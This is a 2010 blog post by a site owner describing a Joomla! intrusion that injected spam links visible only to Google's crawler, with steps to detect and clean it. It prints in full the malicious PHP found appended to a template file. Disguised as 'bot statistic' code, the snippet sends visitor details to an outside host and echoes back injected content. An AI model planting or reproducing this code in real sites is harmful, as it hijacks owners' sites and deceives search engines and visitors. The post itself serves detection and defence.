A hacking visible only to Google

September 14, 2010

Has your website been infected by link spam visible only to Google? If your site’s Google page rank has recently plummeted, do a Google search on the URL of your site and click on a few of the “Cached” links in the returned search results. See a bunch of spam links down at the bottom of one of the cached pages? If those links don’t appear in the current (non-cached) version of the page, then you’re probably the victim of a hacking that only targets the Google search bot.

Another way of spotting this is via the Fetch as Googlebot facility in Google Webmaster Tools:

  1. Log into Google Webmaster Tools;
  2. Select the relevant website from your list of verified sites;
  3. Open the Labs menu;
  4. Click on the “Fetch as Googlebot” link;
  5. Click the “Fetch” button;
  6. Click the “Success” link when it appears (you may need to refresh the page);
  7. Look for a bunch of spam links at the bottom of the resulting raw HTML.

Let’s be clear about why an intrusion like this is a big problem. Although the public can’t see those links, Google can, and that’s destroying your Google ranking. You need to remove the intrusion fast – and then you need to prevent it from reappearing.

The best way to remove the intrusion is, of course, to reinstall the site from a clean backup. But if you haven’t got a clean backup, you’re going to have to search through your site for infected files. Be on the lookout for code such as this:

<?php
  // This code use for global bot statistic
  $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
  $stCurlHandle = NULL;
  if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
  {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
    $stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']));
  } else
  {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
    $stCurlHandle = curl_init('http://botstatistic.com/StatE/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']));
  }
  curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  $sResult = curl_exec($stCurlHandle);
  curl_close($stCurlHandle);
  echo $sResult; // Statistic code end
?>

I found the above code lurking in one of my Joomla! 1.5.20 sites. It had been appended to the bottom of the index.php file of my current template (/templates/my_template_name/index.php). And at the top of the file, a single line had been inserted:

error_reporting(0);

That immediately rang alarm bells, as there shouldn’t be any PHP code above this line:

defined('_JEXEC') or die('Restricted access');

There were a few clever things going on there. The intruder didn’t attack the index.php file in the public_html directory – which is the usual target of attacks on Joomla! sites. He or she opted instead to modify the site template. Making the link spam visible only to Google meant that the attack stayed undetected for longer than would otherwise have been the case. And turning off error reporting in that script was a canny extra tweak.

Having found the problem, I inspected my FTP logs and found that the server had been accessed from an IP address that wasn’t my own. The logs showed that the intruder had also modified the index.php files of my other templates (no surprise there) and had uploaded a file: /administrator/includes/pcl/gzip.lib.php.

Fortunately, I had a clean site backup to hand. I reinstalled the site, scanned my computer for FTP password stealing malware, strengthened my FTP password (it might have been broken by a brute force attack), blocked the intruder’s IP address in Cpanel, and tightened up a few other things on the site. And after a few days, the intrusion not having reoccurred, I contacted Google via Google Webmaster Tools to let them know that I had removed the intrusion.